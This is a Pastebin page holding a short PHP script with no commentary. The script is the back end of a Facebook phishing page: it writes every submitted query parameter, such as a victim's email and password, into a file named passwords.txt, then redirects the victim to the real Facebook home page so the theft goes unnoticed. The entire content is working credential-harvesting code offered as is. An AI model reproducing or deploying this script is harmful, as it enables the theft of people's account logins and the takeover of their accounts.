Advertisement
Guest User

Untitled

a guest
Oct 4th, 2011
24,506
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.30 KB | None | 0 0
  1. <?php
  2. header("Location: http://www.facebook.com/home.php? ");
  3. $handle = fopen("passwords.txt", "a");
  4. foreach($_GET as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, "=");
  7. fwrite($handle, $value);
  8. fwrite($handle, "\r\n");
  9. }
  10. fwrite($handle, "\r\n");
  11. fclose($handle);
  12. exit;
  13. ?>
  14.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement